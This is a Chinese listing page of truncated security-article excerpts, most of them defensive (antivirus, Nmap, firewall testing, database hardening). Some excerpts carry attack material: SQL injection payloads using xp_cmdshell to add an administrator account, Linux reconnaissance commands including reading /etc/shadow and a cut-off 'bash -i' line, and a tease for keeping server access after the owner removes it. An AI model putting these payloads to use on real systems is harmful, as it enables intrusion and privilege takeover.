现在企业大部分的网络设备与应用软件,都是依靠口令来保证其安全性的。若口令丢失的话,可想而知,会给企业的网络安全带来多大的风险,很可能在不知不觉中,企业网络中的主机成为了黑客的肉鸡,成为他们攻击其他网络的跳板;甚至企业的那些所谓机密信息也会一览无余
2015-06-28网络和各种存储设备的飞速发展,使得病毒传播的几率也大大的增加了。虽然可以通过安装防病毒软件和网络防火墙来保护你的系统,但是由于病毒技术的发展势头十分迅猛,甚至许多网页中都包含了很多恶意代码,如果用户的防范意识不强的话,即使安装了防病毒软件也很容易
2015-06-28如果你的电脑中一种新型的木马病毒你能怎么办?特别是一些未知类型的木马病毒,使用一般的杀毒软件或防木马软件是很难将其根除的,这时候我们就需要手动来清除这些病毒文件了。 其实我们只要能破坏这些病毒的启动条件,就可以达到清除病毒的目的,为此,就本
2015-06-28第一招:屏幕保护 在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能
2015-06-28该技巧适合 Windows 2000 / XP / Vista * 最好有基本的命令行知识。不过也没关系,按照下面的步骤做就行了。准备:1.一张图片 2.一个做试验的txt文件 3.WinRAR 步骤: 1:准备一张图片,比如 winshome.jpg。
2015-06-28VoIP指的是在使用了互联网协议的网络上进行语音传输,其中的IP是代表互联网协议,它是互联网的中枢,互联网协议可以将电子邮件、即时信息以及网页传输到成千上万的PC或者手机上。有人说它是电信杀手,也有人说它是国际事务中的革命性因素。总之吹捧甚多。但是,
2015-06-28一、Nmap端口扫描器简介 Nmap是一款免费的开源工具,英文名称是Network Mapper,是端口扫描器中的一个佼佼者,在电影《黑客帝国》中曾出现过它的身影。图1、Nmap端口扫描图形界面Zenmap Nmap使用IP数据包来分析在网络中有哪些主机是可用的,以及这些
2015-06-28最近笔者在网上看到一个新文章《JSESSIONID Regeneration in Struts 2》,讲的是一段代码,在STRUTS 2框架中,防御Session Fixation攻击。笔者比较老土,看不懂英文,还好能看懂代码,发现这是一种平时开发中(至少自己是这样),从来没注意过的攻击。关于这种攻
2015-06-28在局域网中为了方便与其他工作站交流信息,我们常常会用到远程桌面功能,许多人会认为这样的功能简单得几乎不值一提,不过在实际使用过程中,我们有时会遇到各种特殊的远程桌面连接需求,要想顺利满足这些特殊的连接需求,就必须要掌握一些远程桌面的使用技巧。
2015-06-28对于企业网络中的安全人员来说,并非部署上防火墙就万事大吉了,还需要定期的来测试你的防火墙是否还足够安全,然而防火墙测试并不是一件容易的事情,尤其在具有多个处理设备处理多个接口的环境中更是麻烦。本文介绍几个工具来帮助完成测试工作,比如规则分析工
2015-06-28本主题使用KIS8.0.0.454官方简体中文版作为介绍 下载卡巴斯基:https://www.itmop.com/soft/downinfo/2414.html 一、反恶意软件保护 卡巴8.0的反恶意软件分为文件和内存,电子邮件和即时消息,网络监控 1.文件和内存保护 保护范围设置: 选择
2015-06-28;exec master..xp_cmdshell "net user name password /add"--;exec master..xp_cmdshell "net localgroup administrators name /add"--程序代码开启cmdshell的SQL语句EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'判断存储扩
2015-06-281.阻止对恶意软件服务器的访问 当台式机用户从未知的恶意软件服务器请求HTTP和HTTPS网页时,立即阻止此请求,节约带宽并扫描资源。 2.把移动代码限制到值得信任的网站 脚本和活跃代码等移动代码可以让网络更加丰富有趣,但也黑客渗透桌面计算机和运行
2015-06-28使用本文中的方法前提是系统所在分区为NTFS格式。 一、未中招前的保卫方法 如果是刚装的系统,还没有感染恶意软件或者病毒,在这种情况下,比较好办,只要取消所有用户对IE文件夹的写权限就可以了,这样一些恶意软件企图植入IE时,因为没有"写"权限
2015-06-28数据库是Web的命脉,由于管理者的安全疏漏使得其成为攻击者入侵Web的入口。如何来加固Web数据库呢?笔者就以当前使用比较广泛的Access和MSSQL数据库为例,说说Web数据库的安全防护。 1、Access数据库防下载 数据库被下载这对Web来说几乎是毁灭性的,因为
2015-06-28有很多朋友的有服务器了,但是被系统管理员发现了,就会删除你的号,哎……有后门,但是系统管理员把CMD禁止了net .exe net 1.exe.删除了号,有的朋友说我还可以管理啊!那管理的权限非常小…… 很完无赖吧? 那就看我的图文教程 我的
2015-06-28今天VBS群里有人要了解ARP攻击,ARP攻击盛行于局域网,找了这个BAT,对付ARP攻击。 网上流行一个vbs的虚拟网关,也有斯普林的程式的,这个是批处理,加开机批处理,爽到不行了! @echo off FOR /F "usebackq eol=; tokens=2 delims=
2015-06-28cat /etc/passwd 查看linux用户 cat /etc/shadow 查看用户密码需要root权限 cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息 ifconfig 查看本机ip信息 cat /etc/resolv.conf 查看DNS信息 bash -i
2015-06-28在使用无线路由器进行无线冲浪的时候,我们周围的邻居很有可能在无意间闯入本地无线网络中,这些邻居在免费享用着我们提供的宽带的同时,或许会尝试登录进本地无线路由器后台管理界面,来对本地无线网络进行非法攻击,导致本地无线网络无法正常工作。为了谨防这
2015-06-28一、前言 我们知道,随着网络的发展和用户要求的变化,从Cisco IOS12.0 开始,CISCO 路由器新增加了一种基于时间的访问列表。通过它,可以根据一天中的不同时间,或者根据一星期中的不同日期,当然也可以二者结合起来,控制对网络数据包的转发,实现对网络的安全保护
2015-06-28